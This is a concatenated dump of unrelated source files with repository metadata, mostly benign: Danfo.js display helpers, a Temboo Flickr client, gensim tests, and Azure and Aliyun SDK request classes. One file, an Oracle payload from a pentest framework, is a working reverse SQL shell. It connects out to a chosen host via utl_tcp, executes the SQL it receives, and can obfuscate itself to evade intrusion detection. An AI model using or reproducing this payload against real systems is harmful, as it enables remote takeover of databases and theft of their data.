libsvm_path = VmafConfig.root_path('libsvm', 'python')
if libsvm_path not in sys.path:
# Inject {project}/libsvm/python to PYTHONPATH dynamically
sys.path.append(libsvm_path)
try:
# This import will work only if above injection was meaningful (ie: user has the files in the right place)
from svmutil import * # noqa
except ImportError as e:
print "Can't import svmutil from %s: %s" % (libsvm_path, e)
sys.exit(1)
|
[
"[email protected]"
] | |
a85f58e88b5664a708051c99c0c4ada535118d4e
|
70121257e52e0fd2f0895414fcee3c991737443a
|
/python_recipes/danfo_csv.py
|
96c22906850257b9b40aa400587b7180e3fa23bd
|
[] |
no_license
|
OlgaBelitskaya/cookbooks
|
2e54208bb5e5157814deea6ff71cd7ce5b1e4972
|
216dde3e5617203371ed4c4bb7d9e8391640c588
|
refs/heads/master
| 2021-07-11T15:56:44.923442 | 2021-03-25T08:38:46 | 2021-03-25T08:38:46 | 99,447,645 | 0 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,696 |
py
|
from IPython.core.display import display,HTML
def danfo_table_csv(url,columns,header_font_size):
html_str="""<html><head><meta charset='UTF-8'>"""+\
"""<meta name='viewport' """+\
"""content='width=device-width,initial-scale=1.0'>"""+\
"""<script src='https://cdn.jsdelivr.net/npm/"""+\
"""[email protected]/dist/index.min.js'></script></head>"""+\
"""<div><p> CSV =>>> Danfo DataFrames</p>"""+\
"""<div id='div015_1'></div><script>"""+\
"""var url='"""+url+"""'; """+\
"""dfd.read_csv(url)"""+\
""" .then(df=>{df.loc({columns:"""+str(columns)+\
"""}).plot('div015_1').table({header_style:"""+\
"""{font:{size:"""+str(header_font_size)+"""}}})})"""+\
""" .catch(err=>{console.log(err);})"""+\
"""</script></div></html>"""
display(HTML(html_str))
def danfo_chart_csv(url,columns,line_width,title):
html_str="""<html><head><meta charset='UTF-8'>"""+\
"""<meta name='viewport' """+\
"""content='width=device-width,initial-scale=1.0'>"""+\
"""<script src='https://cdn.jsdelivr.net/npm/"""+\
"""[email protected]/dist/index.min.js'> </script></head>"""+\
"""<body><p> CSV =>>> Danfo DataFrames</p>"""+\
"""<div id='div015_2'></div><script>"""+\
"""var url='"""+url+"""'; """+\
"""dfd.read_csv(url).then(df=>{var layout={"""+\
""" title:'"""+title+\
"""',xaxis:{title:'columns'},"""+\
""" yaxis:{title:'value'}}; """+\
""" df.plot('div015_2').line({"""+\
"""line:{width:"""+str(line_width)+"""},"""+\
"""columns:"""+str(columns)+""",layout:layout})})"""+\
""" .catch(err=>{console.log(err);})"""+\
"""</script></body></html>"""
display(HTML(html_str))
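# Illustrative calls (the URL and column names are placeholders, not from the original):
# danfo_table_csv('https://example.com/data.csv', ['col1', 'col2'], 14)
# danfo_chart_csv('https://example.com/data.csv', ['col1', 'col2'], 2, 'My chart')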
|
[
"[email protected]"
] | |
55dbe8317f1c57f0eda91ec6f4ea5d6a3355faf5
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Flickr/Places/FindByKeyword.py
|
c0620abf4ec0d8e85c197a86e1e3a6d28555d771
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,859 |
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# FindByKeyword
# Returns a list of place IDs for a query string.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FindByKeyword(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the FindByKeyword Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Flickr/Places/FindByKeyword')
def new_input_set(self):
return FindByKeywordInputSet()
def _make_result_set(self, result, path):
return FindByKeywordResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return FindByKeywordChoreographyExecution(session, exec_id, path)
class FindByKeywordInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the FindByKeyword
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Flickr (AKA the OAuth Consumer Key).)
"""
InputSet._set_input(self, 'APIKey', value)
def set_Query(self, value):
"""
Set the value of the Query input for this Choreo. ((required, string) The query string to use for place ID lookups.)
"""
InputSet._set_input(self, 'Query', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: xml and json. Defaults to json.)
"""
InputSet._set_input(self, 'ResponseFormat', value)
class FindByKeywordResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the FindByKeyword Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Flickr.)
"""
return self._output.get('Response', None)
class FindByKeywordChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return FindByKeywordResultSet(response, path)
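# Illustrative usage (the session object and key are placeholders, and
# `execute_with_results` is assumed from the standard Temboo SDK surface):
#   choreo = FindByKeyword(temboo_session)
#   inputs = choreo.new_input_set()
#   inputs.set_APIKey('YOUR_FLICKR_KEY')
#   inputs.set_Query('paris')
#   results = choreo.execute_with_results(inputs)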
|
[
"[email protected]"
] | |
a3a07052f03a7dc28d6f2c41f80889cbc46bc905
|
32c6590127686114bfacff11fa7cd646025d3819
|
/test_project/test_app/models.py
|
e45ce8711f5854e739457ed3382e0356433d6b1c
|
[
"BSD-2-Clause"
] |
permissive
|
revsys/django-test-plus
|
42cc6cddde30f561bec91294d2e85c21cbc62887
|
9cfb0c865b1dcad1ca6c9c4717d67ea8d476269c
|
refs/heads/main
| 2023-08-29T03:52:59.089300 | 2023-07-11T11:37:47 | 2023-07-11T11:37:47 | 36,131,033 | 618 | 75 |
BSD-3-Clause
| 2023-07-11T11:35:24 | 2015-05-23T16:08:52 |
Python
|
UTF-8
|
Python
| false | false | 154 |
py
|
from django.db import models
class Data(models.Model):
""" Simple model to test our query assertions """
name = models.CharField(max_length=50)
|
[
"[email protected]"
] | |
053f64e6385d70d8e49c045ff44d38e56873a99a
|
d4a569dcf616b7f05e53a44803e38196b436b8b9
|
/[email protected]/Lib/site-packages/mypy/typeshed/third_party/2and3/dateutil/utils.pyi
|
3eefd2e48ba5311cbdb709991a6815cdd94459e1
|
[
"MIT"
] |
permissive
|
nverbois/TFE21-232
|
ac3178d24939c872c02a671c0f1d8cc471af516b
|
7113837b5263b5c508bfc6903cb6982b48aa7ee4
|
refs/heads/main
| 2023-06-05T18:50:59.207392 | 2021-06-25T19:54:40 | 2021-06-25T19:54:40 | 337,691,391 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 281 |
pyi
|
from typing import Optional
from datetime import datetime, tzinfo, timedelta
def default_tzinfo(dt: datetime, tzinfo: tzinfo) -> datetime: ...
def today(tzinfo: Optional[tzinfo] = ...) -> datetime: ...
def within_delta(dt1: datetime, dt2: datetime, delta: timedelta) -> bool: ...
|
[
"[email protected]"
] | |
8cae290d2e0f4814c027458fafbd56b76c6c8859
|
e99bc88c211c00a701514761fdfcb9b755e6de4e
|
/payloads/oracle/reverse_sql.py
|
c8a4d05996c833f8976901daa94da532f212e589
|
[] |
no_license
|
Wuodan/inguma
|
177f40f636d363f081096c42def27986f05e37e7
|
c82e7caf86e24ad9783a2748c4f1d9148ad3d0ee
|
refs/heads/master
| 2020-03-26T21:52:28.421738 | 2013-03-20T20:45:13 | 2018-08-20T12:19:30 | 145,413,992 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,506 |
py
|
#!/usr/bin/python
"""
NOTE: Should be rewritten from scratch!!!!
"""
import sys
sys.path.append("../../lib")
sys.path.append("../lib")
sys.path.append("lib")
import run_command
from oracleids import randomizeSpaces
data = """
DECLARE
data varchar2(32767);
v_ret varchar2(32767);
len number;
conn utl_tcp.connection;
BEGIN
conn := utl_tcp.open_connection(remote_host => '%HOST%', remote_port => %PORT%, charset => 'US7ASCII');
loop
data := utl_tcp.get_line(conn);
data := substr(data, 1, length(data)-1);
if lower(data) = 'exit' then
exit;
else
begin
if lower(data) like 'select%' then
execute immediate data into v_ret;
else
execute immediate data;
v_ret := 'Statement executed';
end if;
len := utl_tcp.write_line(conn, 'RET:' || v_ret);
exception
when others then
len := utl_tcp.write_line(conn, 'ERROR: ' || sqlcode || ' - ' || sqlerrm);
end;
end if;
dbms_output.put_line('"' || data || '"');
end loop;
utl_tcp.close_connection(conn);
END;
"""
name = "reverse_sql"
brief_description = "Run a blind reverse SQL terminal"
class CPayload:
user = "TEST"
function = "F1"
useDML = False
covert = 0
verifyCommand = ""
connection = None
type = 0
host = ""
port = ""
connection = None
def __init__(self):
pass
def run(self):
global data
tmp = data
tmp = tmp.replace("%USER%", self.user)
if self.host == "":
self.host = raw_input("Host to connect: ")
if self.port == "":
self.port = raw_input("Port to listen: ")
tmp = tmp.replace("%HOST%", self.host)
tmp = tmp.replace("%PORT%", self.port)
if self.covert > 0:
# Currently only one IDS evasion technique is used
tmp = randomizeSpaces(tmp)
objRun = run_command.CPayload()
objRun.idsTechniques = self.covert
objRun.user = self.user
objRun.command = tmp
ret = objRun.run()
return ret
def verify(self, connection):
sql = self.verifyCommand
cursor = connection.cursor()
cursor.execute(sql)
for x in cursor.fetchall():
return True
return False
def main():
import cx_Oracle
a = CPayload()
a.idsTechniques = 1
cmd = a.run()
print cmd
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
e55349cdae31ad6838c68bcf8a78353c4625794a
|
1e0355b293100873cedfcac789655a35180781db
|
/BOJ1541.py
|
80f1eee1110f147baa91c39f0bbea9e2989c2d24
|
[
"MIT"
] |
permissive
|
INYEONGKIM/BOJ
|
47dbf6aeb7a0f1b15208866badedcd161c00ee49
|
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
|
refs/heads/master
| 2021-06-14T13:50:04.124334 | 2021-03-09T14:04:14 | 2021-03-09T14:04:14 | 168,840,573 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 164 |
py
|
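# Greedy: every '+'-group after the first '-' can be subtracted as a whole,
# so split on '-', add up the first group, and subtract the sums of the rest.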
s=input().split("-")
if s[0]=="":
res=0
else:
res=sum(map(int,s[0].split("+")))
for i in range(1,len(s)):
res-=sum(map(int,s[i].split("+")))
print(res)
|
[
"[email protected]"
] | |
b4a2db0fc6da43c2eb0ad5f2cd65f2c360d65ad7
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/eDQDChGrv6y4fd44j_20.py
|
1a24d4d5555b5a19f0f2a0043b0899ec7134f363
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,156 |
py
|
"""
A billboard is an `m * n` list, where each list element consists of either one
letter or a blank space. You are given a phrase and the billboard dimensions.
Create a function that determines whether you can place the complete phrase on
the billboard.
There are two rules:
1. If there is a space between two words:
* If they are on the same row, you must put a space.
* If they are two different rows, the space is optional.
2. You can only put COMPLETE words on a row.
To illustrate, `can_put("GOOD MORN", [2, 4])` should yield `True`, since while
there is a space between "GOOD" and "MORN", it's not needed since both words
are on separate rows.
[
["G", "O", "O", "D"],
["M", "O", "R", "N"]
]
On the other hand `can_put("GOOD MORN", [1, 8])` should yield `False`. Since
both words reside in the first row, we require nine spots, and eight would
yield the incomplete phrase "GOOD MOR".
[
["G", "O", "O", "D", "_", "M", "O", "R"]
]
We would also return `False` if we could not fit a word on a row. So
`can_put("GOOD MORN", [3,3])` should yield `False`, since we can only fit
"GOO" on the first row.
[
["G", "O", "O"],
["D", "_", "M"],
["O", "R", "N"]
]
# No good!
### Examples
can_put("HEY JUDE", [2, 4]) ➞ True
can_put("HEY JUDE", [1, 8]) ➞ True
can_put("HEY JUDE", [1, 7]) ➞ False
can_put("HEY JUDE", [4, 3]) ➞ False
### Notes
It is okay to leave extra empty spaces on one line if you cannot fit two words
with a space. For example, in a 5 x 5 billboard, you can put "BE" on the first
row and "HAPPY" on the second row.
"""
def can_put(message, dimensions):
def fit_word(pointer, word):
height, width = dimensions
row, col = pointer
if width - col >= len(word): #fits in line
return (row, col + len(word) + 1)
elif row + 1 < height and len(word) <= width:
return (row + 1, len(word) + 1)
pointer = (0,0)
for word in message.split():
pointer = fit_word(pointer, word)
if not pointer:
return False
return True
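# Illustrative checks taken from the docstring above:
assert can_put("HEY JUDE", [2, 4]) and can_put("HEY JUDE", [1, 8])
assert not can_put("HEY JUDE", [1, 7]) and not can_put("HEY JUDE", [4, 3])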
|
[
"[email protected]"
] | |
4f4b68ca0c6623d671747618cbe6275ec180ab9f
|
b22cbe574c6fd43fde3dc82441805917b5996bb2
|
/test/util.py
|
9a84f69774201372124c9d12aad475c699637b11
|
[] |
no_license
|
matthagy/hlab
|
7a7b16526ee06f9b6211e387795e09c6438b536c
|
1bea77cf6df460f1828f99f3a54251d20e2d0f3d
|
refs/heads/master
| 2021-01-25T03:26:52.311278 | 2012-07-23T16:20:11 | 2012-07-23T16:20:11 | 2,352,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,332 |
py
|
'''Assorted unit tests utilities
'''
import unittest
from HH2.pathutils import FilePath,DirPath
def basepath():
filebase = FilePath(__file__).abspath().stripext()
backpath = __name__.replace('.','/')
assert filebase.endswith(backpath)
path = DirPath(filebase[:-len(backpath)])
assert path.isdir()
return path
basepath = basepath()
loader = unittest.TestLoader()
def load_file_tests(path):
path = path.stripext()
assert path.startswith(basepath)
name = path[len(basepath)+1::].replace('/','.')
mod = __import__(name, fromlist=name.rsplit('.',1)[-1:])
return loader.loadTestsFromModule(mod)
def load_directory_tests(path, recursive=True):
tests = []
for p in DirPath(path):
if p.isdir():
if recursive:
tests.extend(load_directory_tests(p, recursive=True))
elif (p.endswith('.py') and not p.basename().startswith('.') and
              not p.basename().startswith('__') and not p.basename() in ['util']):
tests.extend(load_file_tests(p))
return tests
def test_directory(basefile):
basefile = FilePath(basefile)
assert basefile.basename().startswith('__main__.py')
tests = unittest.TestSuite(load_directory_tests(basefile.abspath().parent()))
runner = unittest.TextTestRunner(verbosity=2)
runner.run(tests)
|
[
"[email protected]"
] | |
e91fb3b0579a68d2e180e42add34ad6919708d82
|
3929d114c1bc6aef86402300a8d5b278849d41ae
|
/186. Reverse Words in a String II.py
|
8cc8dc1f28c024f2e87d00719eb97c60a509c32c
|
[] |
no_license
|
lxyshuai/leetcode
|
ee622235266017cf18da9b484f87c1cf9ceb91d0
|
5f98270fbcd2d28d0f2abd344c3348255a12882a
|
refs/heads/master
| 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,135 |
py
|
"""
Given an input string, reverse the string word by word. A word is defined as a sequence of non-space characters.
The input string does not contain leading or trailing spaces and the words are always separated by a single space.
For example,
Given s = "the sky is blue",
return "blue is sky the".
Could you do it in-place without allocating extra space?
"""
class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
def reverse(string_list, left, right):
while left < right:
string_list[left], string_list[right] = string_list[right], string_list[left]
left += 1
right -= 1
string_list = list(s)
reverse(string_list, 0, len(string_list) - 1)
left = 0
right = 0
while right < len(string_list):
if string_list[right].isspace():
reverse(string_list, left, right - 1)
left = right + 1
            right += 1
        # the loop above never reverses the trailing word; handle it here
        reverse(string_list, left, len(string_list) - 1)
        return ''.join(string_list)
if __name__ == '__main__':
print Solution().reverseWords('a b c d')
|
[
"[email protected]"
] | |
9dfef73bdb4ca36d08e448d5637ff33d58b50b88
|
325fde42058b2b82f8a4020048ff910cfdf737d7
|
/src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2019_02_01/models/managed_cluster_addon_profile_py3.py
|
71e05cd14c0e9e64885cfee910165304b5df4421
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
ebencarek/azure-cli-extensions
|
46b0d18fe536fe5884b00d7ffa30f54c7d6887d1
|
42491b284e38f8853712a5af01836f83b04a1aa8
|
refs/heads/master
| 2023-04-12T00:28:44.828652 | 2021-03-30T22:34:13 | 2021-03-30T22:34:13 | 261,621,934 | 2 | 5 |
MIT
| 2020-10-09T18:21:52 | 2020-05-06T01:25:58 |
Python
|
UTF-8
|
Python
| false | false | 1,290 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ManagedClusterAddonProfile(Model):
"""A Kubernetes add-on profile for a managed cluster.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Whether the add-on is enabled or not.
:type enabled: bool
:param config: Key-value pairs for configuring an add-on.
:type config: dict[str, str]
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'enabled': {'key': 'enabled', 'type': 'bool'},
'config': {'key': 'config', 'type': '{str}'},
}
def __init__(self, *, enabled: bool, config=None, **kwargs) -> None:
super(ManagedClusterAddonProfile, self).__init__(**kwargs)
self.enabled = enabled
self.config = config
|
[
"[email protected]"
] | |
419db0786d502a3cf9c1eae20144f684848c9409
|
13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab
|
/home--tommy--mypy/mypy/lib/python2.7/site-packages/gensim/test/test_utils.py
|
240900129cf6621eddafef08f2c921360b47d10e
|
[
"Unlicense"
] |
permissive
|
tommybutler/mlearnpy2
|
8ec52bcd03208c9771d8d02ede8eaa91a95bda30
|
9e5d377d0242ac5eb1e82a357e6701095a8ca1ff
|
refs/heads/master
| 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 |
Unlicense
| 2022-10-15T23:32:18 | 2018-01-22T23:27:10 |
Python
|
UTF-8
|
Python
| false | false | 6,864 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking various utils functions.
"""
import logging
import unittest
import numpy as np
from six import iteritems
from gensim import utils
class TestIsCorpus(unittest.TestCase):
def test_None(self):
# test None
result = utils.is_corpus(None)
expected = (False, None)
self.assertEqual(expected, result)
def test_simple_lists_of_tuples(self):
# test list words
# one document, one word
potentialCorpus = [[(0, 4.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
# one document, several words
potentialCorpus = [[(0, 4.), (1, 2.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
potentialCorpus = [[(0, 4.), (1, 2.), (2, 5.), (3, 8.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
# several documents, one word
potentialCorpus = [[(0, 4.)], [(1, 2.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
potentialCorpus = [[(0, 4.)], [(1, 2.)], [(2, 5.)], [(3, 8.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
def test_int_tuples(self):
potentialCorpus = [[(0, 4)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
def test_invalid_formats(self):
# test invalid formats
# these are no corpus, because they do not consists of 2-tuples with
# the form(int, float).
potentials = list()
potentials.append(["human"])
potentials.append("human")
potentials.append(["human", "star"])
potentials.append([1, 2, 3, 4, 5, 5])
potentials.append([[(0, 'string')]])
for noCorpus in potentials:
result = utils.is_corpus(noCorpus)
expected = (False, noCorpus)
self.assertEqual(expected, result)
class TestUtils(unittest.TestCase):
def test_decode_entities(self):
# create a string that fails to decode with unichr on narrow python builds
body = u'It’s the Year of the Horse. YES VIN DIESEL 🙌 💯'
expected = u'It\x92s the Year of the Horse. YES VIN DIESEL \U0001f64c \U0001f4af'
self.assertEqual(utils.decode_htmlentities(body), expected)
class TestSampleDict(unittest.TestCase):
def test_sample_dict(self):
d = {1: 2, 2: 3, 3: 4, 4: 5}
expected_dict = [(1, 2), (2, 3)]
expected_dict_random = [(k, v) for k, v in iteritems(d)]
sampled_dict = utils.sample_dict(d, 2, False)
self.assertEqual(sampled_dict, expected_dict)
sampled_dict_random = utils.sample_dict(d, 2)
if sampled_dict_random in expected_dict_random:
self.assertTrue(True)
class TestWindowing(unittest.TestCase):
arr10_5 = np.array([
[0, 1, 2, 3, 4],
[1, 2, 3, 4, 5],
[2, 3, 4, 5, 6],
[3, 4, 5, 6, 7],
[4, 5, 6, 7, 8],
[5, 6, 7, 8, 9]
])
def _assert_arrays_equal(self, expected, actual):
self.assertEqual(expected.shape, actual.shape)
self.assertTrue((actual == expected).all())
def test_strided_windows1(self):
out = utils.strided_windows(range(5), 2)
expected = np.array([
[0, 1],
[1, 2],
[2, 3],
[3, 4]
])
self._assert_arrays_equal(expected, out)
def test_strided_windows2(self):
input_arr = np.arange(10)
out = utils.strided_windows(input_arr, 5)
expected = self.arr10_5.copy()
self._assert_arrays_equal(expected, out)
out[0, 0] = 10
self.assertEqual(10, input_arr[0], "should make view rather than copy")
def test_strided_windows_window_size_exceeds_size(self):
input_arr = np.array(['this', 'is', 'test'], dtype='object')
out = utils.strided_windows(input_arr, 4)
expected = np.ndarray((0, 0))
self._assert_arrays_equal(expected, out)
def test_strided_windows_window_size_equals_size(self):
input_arr = np.array(['this', 'is', 'test'], dtype='object')
out = utils.strided_windows(input_arr, 3)
expected = np.array([input_arr.copy()])
self._assert_arrays_equal(expected, out)
def test_iter_windows_include_below_window_size(self):
texts = [['this', 'is', 'a'], ['test', 'document']]
out = utils.iter_windows(texts, 3, ignore_below_size=False)
windows = [list(w) for w in out]
self.assertEqual(texts, windows)
out = utils.iter_windows(texts, 3)
windows = [list(w) for w in out]
self.assertEqual([texts[0]], windows)
def test_iter_windows_list_texts(self):
texts = [['this', 'is', 'a'], ['test', 'document']]
windows = list(utils.iter_windows(texts, 2))
list_windows = [list(iterable) for iterable in windows]
expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
self.assertListEqual(list_windows, expected)
def test_iter_windows_uses_views(self):
texts = [np.array(['this', 'is', 'a'], dtype='object'), ['test', 'document']]
windows = list(utils.iter_windows(texts, 2))
list_windows = [list(iterable) for iterable in windows]
expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
self.assertListEqual(list_windows, expected)
windows[0][0] = 'modified'
self.assertEqual('modified', texts[0][0])
def test_iter_windows_with_copy(self):
texts = [
np.array(['this', 'is', 'a'], dtype='object'),
np.array(['test', 'document'], dtype='object')
]
windows = list(utils.iter_windows(texts, 2, copy=True))
windows[0][0] = 'modified'
self.assertEqual('this', texts[0][0])
windows[2][0] = 'modified'
self.assertEqual('test', texts[1][0])
def test_flatten_nested(self):
nested_list = [[[1, 2, 3], [4, 5]], 6]
expected = [1, 2, 3, 4, 5, 6]
self.assertEqual(utils.flatten(nested_list), expected)
def test_flatten_not_nested(self):
not_nested = [1, 2, 3, 4, 5, 6]
expected = [1, 2, 3, 4, 5, 6]
self.assertEqual(utils.flatten(not_nested), expected)
if __name__ == '__main__':
logging.root.setLevel(logging.WARNING)
unittest.main()
|
[
"[email protected]"
] | |
547f56cae470648424b7485f6231f2167b17b872
|
9405aa570ede31a9b11ce07c0da69a2c73ab0570
|
/aliyun-python-sdk-hbase/aliyunsdkhbase/request/v20190101/CreateInstanceRequest.py
|
6dcc7d5ca183ba80569cfe098efcfdd438b27383
|
[
"Apache-2.0"
] |
permissive
|
liumihust/aliyun-openapi-python-sdk
|
7fa3f5b7ea5177a9dbffc99e73cf9f00e640b72b
|
c7b5dd4befae4b9c59181654289f9272531207ef
|
refs/heads/master
| 2020-09-25T12:10:14.245354 | 2019-12-04T14:43:27 | 2019-12-04T14:43:27 | 226,002,339 | 1 | 0 |
NOASSERTION
| 2019-12-05T02:50:35 | 2019-12-05T02:50:34 | null |
UTF-8
|
Python
| false | false | 6,117 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkhbase.endpoint import endpoint_data
class CreateInstanceRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'HBase', '2019-01-01', 'CreateInstance','hbase')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ClusterName(self):
return self.get_query_params().get('ClusterName')
def set_ClusterName(self,ClusterName):
self.add_query_param('ClusterName',ClusterName)
def get_DbInstanceConnType(self):
return self.get_query_params().get('DbInstanceConnType')
def set_DbInstanceConnType(self,DbInstanceConnType):
self.add_query_param('DbInstanceConnType',DbInstanceConnType)
def get_EngineVersion(self):
return self.get_query_params().get('EngineVersion')
def set_EngineVersion(self,EngineVersion):
self.add_query_param('EngineVersion',EngineVersion)
def get_DepMode(self):
return self.get_query_params().get('DepMode')
def set_DepMode(self,DepMode):
self.add_query_param('DepMode',DepMode)
def get_BackupId(self):
return self.get_query_params().get('BackupId')
def set_BackupId(self,BackupId):
self.add_query_param('BackupId',BackupId)
def get_DbInstanceType(self):
return self.get_query_params().get('DbInstanceType')
def set_DbInstanceType(self,DbInstanceType):
self.add_query_param('DbInstanceType',DbInstanceType)
def get_VSwitchId(self):
return self.get_query_params().get('VSwitchId')
def set_VSwitchId(self,VSwitchId):
self.add_query_param('VSwitchId',VSwitchId)
def get_SecurityIPList(self):
return self.get_query_params().get('SecurityIPList')
def set_SecurityIPList(self,SecurityIPList):
self.add_query_param('SecurityIPList',SecurityIPList)
def get_AutoRenew(self):
return self.get_query_params().get('AutoRenew')
def set_AutoRenew(self,AutoRenew):
self.add_query_param('AutoRenew',AutoRenew)
def get_NetType(self):
return self.get_query_params().get('NetType')
def set_NetType(self,NetType):
self.add_query_param('NetType',NetType)
def get_ZoneId(self):
return self.get_query_params().get('ZoneId')
def set_ZoneId(self,ZoneId):
self.add_query_param('ZoneId',ZoneId)
def get_CoreDiskType(self):
return self.get_query_params().get('CoreDiskType')
def set_CoreDiskType(self,CoreDiskType):
self.add_query_param('CoreDiskType',CoreDiskType)
def get_PricingCycle(self):
return self.get_query_params().get('PricingCycle')
def set_PricingCycle(self,PricingCycle):
self.add_query_param('PricingCycle',PricingCycle)
def get_CoreInstanceQuantity(self):
return self.get_query_params().get('CoreInstanceQuantity')
def set_CoreInstanceQuantity(self,CoreInstanceQuantity):
self.add_query_param('CoreInstanceQuantity',CoreInstanceQuantity)
def get_Duration(self):
return self.get_query_params().get('Duration')
def set_Duration(self,Duration):
self.add_query_param('Duration',Duration)
def get_Engine(self):
return self.get_query_params().get('Engine')
def set_Engine(self,Engine):
self.add_query_param('Engine',Engine)
def get_RestoreTime(self):
return self.get_query_params().get('RestoreTime')
def set_RestoreTime(self,RestoreTime):
self.add_query_param('RestoreTime',RestoreTime)
def get_SrcDBInstanceId(self):
return self.get_query_params().get('SrcDBInstanceId')
def set_SrcDBInstanceId(self,SrcDBInstanceId):
self.add_query_param('SrcDBInstanceId',SrcDBInstanceId)
def get_MasterInstanceType(self):
return self.get_query_params().get('MasterInstanceType')
def set_MasterInstanceType(self,MasterInstanceType):
self.add_query_param('MasterInstanceType',MasterInstanceType)
def get_ColdStorageSize(self):
return self.get_query_params().get('ColdStorageSize')
def set_ColdStorageSize(self,ColdStorageSize):
self.add_query_param('ColdStorageSize',ColdStorageSize)
def get_CoreDiskQuantity(self):
return self.get_query_params().get('CoreDiskQuantity')
def set_CoreDiskQuantity(self,CoreDiskQuantity):
self.add_query_param('CoreDiskQuantity',CoreDiskQuantity)
def get_IsColdStorage(self):
return self.get_query_params().get('IsColdStorage')
def set_IsColdStorage(self,IsColdStorage):
self.add_query_param('IsColdStorage',IsColdStorage)
def get_CoreInstanceType(self):
return self.get_query_params().get('CoreInstanceType')
def set_CoreInstanceType(self,CoreInstanceType):
self.add_query_param('CoreInstanceType',CoreInstanceType)
def get_CoreDiskSize(self):
return self.get_query_params().get('CoreDiskSize')
def set_CoreDiskSize(self,CoreDiskSize):
self.add_query_param('CoreDiskSize',CoreDiskSize)
def get_VpcId(self):
return self.get_query_params().get('VpcId')
def set_VpcId(self,VpcId):
self.add_query_param('VpcId',VpcId)
def get_DbType(self):
return self.get_query_params().get('DbType')
